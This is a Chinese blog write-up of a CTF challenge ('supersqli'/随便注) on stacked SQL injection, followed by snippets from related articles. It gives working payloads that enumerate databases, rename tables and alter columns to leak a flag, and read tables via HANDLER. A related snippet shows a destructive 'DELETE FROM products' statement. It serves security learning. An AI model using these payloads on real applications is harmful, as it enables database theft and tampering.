sql注入堆叠注入分析总结

最新推荐文章于 2024-09-03 23:26:34 发布
最新推荐文章于 2024-09-03 23:26:34 发布
阅读量649 收藏
点赞数 1
分类专栏: ctf记录 文章标签: 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/limenzzz/article/details/124154968
版权

目录

概述

题解

法一

法二 

总结

附言

突然记起一道攻防世界上的题目,用到了堆叠注入,于是在这里借着这道题目总结一下堆叠注入的方法

概述

堆叠注入就是通过结束前一语句后分号结束另外再起一句的注入方法,例如:1';show databases;#

题解

法一

首先尝试万能密码发现没什么用

尝试一下union查找注入点

 

好家伙这是全给过滤了,尝试直接使用堆叠注入破解 ,并使用show来康康

1';show databases;#

 盲猜flag在supersqli里

1';show tables from supersqli;#

1';show columns from `1919810931114514`;#

1';show columns from words;#

 未过滤rename与alert,于是可以把words表名改动,再将恶臭(bushi)表名改为words,把其中的flag字段名改为id,于是可通过原本查询words表中的id的语句查出flag,构造payload

1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`; alter table `words` change `flag` `id` varchar(100);#

然后万能密码查出flag;

法二 

然而通过万能的百度,找到了其他解法,使用handler语句可以更方便地找出flag

1';handler `1919810931114514` open;handler `1919810931114514` read first;#

 这里贴上学习网站

mysql查询语句-handler_jesseyoung的博客-优快云博客_handler查询

总结

多积累点注入姿势总是没错的,这次注入总的来说是由show ……这一语法来实现sql注入

payload相对union来说简单得多。但最后要通过其他方式来获得字段值,当然这是在select等一系列语句被过滤的情况下的无奈之举。

而handler就当是知识储备,以后也可以用到。

附言

本来是想写寄道upload题解总结的。突然想到这个于是就写了一下。至于upload,下次一定,下次一定。

希望自己不要这么菜吧   _(:з」∠)_   ----L1men2 

26-2 SQL注入攻击 - 堆叠注入(Stacked Injection)
weixin_43263566的博客
03-10 734
堆叠注入(Stacked Injection)是指一次性执行多条 SQL 语句的注入技术。在实际应用中,堆叠注入通常指在MySQL等数据库中,通过在命令行中以分号(;)分隔每条语句来实现同时执行多条语句的注入攻击。因此,堆叠注入即为一堆(多条)SQL语句一起执行的注入攻击方式。
SQL注入-07】堆叠注入案例—以sqli-labs-less38为例
m0_64378913的博客
05-05 1082
目录1 堆叠注入概述1.1 定义1.2 与union联合查询注入的对比1.3 局限性2 堆叠注入案例—以sqli-labs-less38为例2.1 实验平台2.2 实验目标2.3 堆叠注入实验步骤2.3.1 注入前准备2.3.2 判断注入点及注入类型2.3.3 判断回显列数及回显位置2.3.4 union注入获取库名表名字段名2.3.5 堆叠注入3 总结参考文章 1 堆叠注入概述 1.1 定义 英文为 stacked injection。 在SQL数据库中,每条语句是以;分开的,堆叠注入就是一次性注入并执
SQL注入堆叠注入-强网杯[随便注]
qq_68163788的博客
02-22 1299
堆叠注入是指攻击者在SQL注入攻击中利用多个查询语句的堆叠,从而绕过应用程序的输入验证,进而执行恶意的SQL代码。攻击者可以通过在输入参数中插入分号或者其他分隔符,使得应用程序在执行SQL查询时将恶意代码与原有查询语句堆叠在一起,从而绕过输入验证,执行恶意代码。 堆叠注入攻击可以导致严重的安全问题,包括数据泄露、数据篡改甚至数据库服务器的完全控制。为了防止堆叠注入攻击,开发人员应该采取一系列安全措施,包括对输入参数进行严格的验证和过滤,使用参数化查询等安全措施来防止SQL注入攻击的发生。
SQL注入进阶——堆叠注入
m0_69151365的博客
02-29 1950
我们最开始先进行常规注入,发现有报错,就考虑联合查询和报错注入,再发现select,update等都被waf过滤掉了,到这之后我们也没啥思路了, 我们去看了源码发现有multi_query()这个函数,我们就考虑了堆叠注入,完了之后就先查表数据,我们查到flag数据位919810931114514这个表中,我没想到的就是预编译,但是select、prepare、set、等都被waf过滤,源码可以发现预编译的关键词都可以使用大写来绕过,select绕不过去,于是我们就使用concat函数将进行拼接。
SQL注入原理-堆叠注入
zl5186888的博客
09-21 698
mysqli_query()只能执行一条SQL语句,如果这需要执行多条SQL语句,就需要使用mysqli_multi_query()方法,mysqli_multi_query()可以执行多条SQL语句,如果后端代码使用这个方法去执行SQL语句,我们就可以利用堆叠注入获取后台数据库的信息。这样我们就得到了当前数据库长度,接下来可以爆出数据库的库名以及接下来的获取数据的各种操作,具体的时间盲注操作可以参考我之前的文章——SQL注入原理之时间盲注,原理都一样,小伙伴理解之后套用就行了。
堆叠注入引发的思考
羽的博客
02-23 567
写这篇博客是因为碰到了一道强网杯随便注的强化版,在这里分享一下总结。 开始的手法一样:通过堆叠注入的常规方法一路show到底可以得到库名表名字段名。 show databases;show tables;show columns from “表名”; 对于限制较小的随便注: 0x01 重命名 通过将`919810931114514`表改成words表,将该表中的flag改为id,使得一开始的查询语...
SQL注入——堆叠注入
nobugnomoney的博客
05-19 3472
一、堆叠注入的原理 1、介绍 在 SQL 中,分号(;)是用来表示一条 sql 语句的结束。试想一下我们在 ; 结束一个 sql 语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而 union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于 union 或者 union all 执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是 任意的语句。 例如下面这个例子: 用户输入: 1; DELETE FROM products
堆叠注入的不同姿势——SQL注入写题笔记
最新发布
2401_82847928的博客
09-03 1391
可以看到把我们第一种方法使用的set和prepare都过滤了,不过没有关系,我们继续使用handler构造payload!使用了strstr对set和prepare过滤,但是这个函数过滤并不严格,采用大小写绕过。handler命令是mysql专有的一个查询表数据的函数,但是不如select功能强大。成功得到字段“flag”,很明显我们就只剩最后一步,爆出该字段的数据即可。但是select已经被比较严格地过滤了,我们需要寻找其他方法。这道题与第一题相似度很高,但是正则表达式过滤的范围有所差别。
sql注入过滤select_SQL注入高级进阶-堆叠注入
weixin_39808803的博客
11-21 1453
原理0x00 堆叠注入定义 Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。而在真实的运用中也是这样的, 我们知道在 mysql 中, 主要是命令行中, 每一条语句结尾加; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection。0x01 堆叠注入原理 在SQL中,分号(;)是用来表示一条s...
第18天:WEB漏洞-SQL注入堆叠及WAF绕过注入1
08-03
堆叠注入(Stacked Injections)是 SQL 注入的一种特殊形式,即在一个 SQL 语句中执行多个语句。 在 MySQL 中,每个语句结尾加;表示语句结束。因此,我们可以将多个语句结合起来,形成一个堆叠注入。例如: id=-1...
堆叠注入原理解析
qq_45927819的博客
03-19 8755
文章目录一、堆叠注入原理二、堆叠注入触发条件三、题目 一、堆叠注入原理 mysql数据库sql语句的默认结束符是以;结尾,在执行多条SQL语句时就要使用结束符隔开,那么在;结束一条sql语句后继续构造下一条语句,是否会一起执行? 因此这个想法也就造就了堆叠注入 二、堆叠注入触发条件 堆叠注入触发的条件很苛刻,因为堆叠注入原理就是通过结束符同时执行多条sql语句,这就需要服务器在访问数据端时使用的是可同时执行多条sql语句的方法,例如php中的mysqli_multi_query函数。但与之相对应的mysql
SQL堆叠注入详解
永远是少年
08-07 764
今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL堆叠注入。 一、SQL 堆叠注入简介 二、SQL堆叠注入实战
SQL注入07】堆叠注入基础及实操(基于sqli-labs-less38)
Fighting_hawk的博客
02-20 5219
1. 了解堆叠注入与union联合查询注入的区别; 2. 了解堆叠注入的限制性因素; 3. 掌握手动堆叠注入的方法。
SQL注入-7】堆叠查询注入与waf绕过
qq_41889600的博客
11-03 368
堆叠注入 waf绕过
sql-堆叠注入
zhhhb1005的博客
08-14 616
前几星期写题时遇见了好几道关于堆叠注入的题目,结果发现我对堆叠注入不是特别了解,所以写一下博客记录一下,但是发现堆叠注入使用的场景和条件好像有点苛刻。
sql注入-07 堆叠注入及WAF绕过注入
weixin_44576725的博客
11-16 1081
堆叠及WAF绕过注入 1、堆叠注入 简介 引用大佬的解释:Stacked injections–堆叠注入。从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在 mysql 中,主要是命令行中,每一条语句结尾加 ; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection。 ​ 在 SQL 中,分号(;)是用来表示一条 sql 语句的结束。试想一下我们在 ; 结束一个 sql 语句后继续构造下一条语句,会不会一起执行
sql注入-堆叠注入】多语句执行、结合其他注入
07-12 5686
堆叠注入】相比其他注入能执行的操作更多
sql注入总结(时间盲注,布尔盲注,无列名注入,regexp盲注,order by注入,二次注入,update注入,报错注入)
2202_75361164的博客
10-28 4061
sql注入总结(时间盲注,布尔盲注,无列名注入,regexp盲注,order by注入,二次注入,update注入,报错注入)
SQL注入-堆叠注入
m0_53820621的博客
08-15 1521
数据库支持堆叠查询,所谓堆叠查询就是执行多条语句,语句以;隔开。并且代码使用了支持堆叠查询的函数,列如PHP的。堆叠注入就是在第二条语句中构造payload,注:页面只返回第一条语句,不返回第二条语句。堆叠注入后果很严重,可以直接对数据库增删改。...
SQL注入深度解析:从二次注入堆叠注入
在Web安全领域,SQL注入是一种常见的攻击手段,其中二次注入堆叠注入是两种特殊形式。二次注入是指应用程序在处理用户输入的数据时,没有充分过滤或转义,直接将其用于构造新的SQL查询,导致恶意数据再次被注入到...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值